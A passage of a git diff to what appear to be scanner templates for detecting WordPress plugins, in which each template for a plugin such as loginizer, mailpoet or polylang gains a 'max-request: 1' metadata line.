b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 656ad7dfe5..648ee176ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: 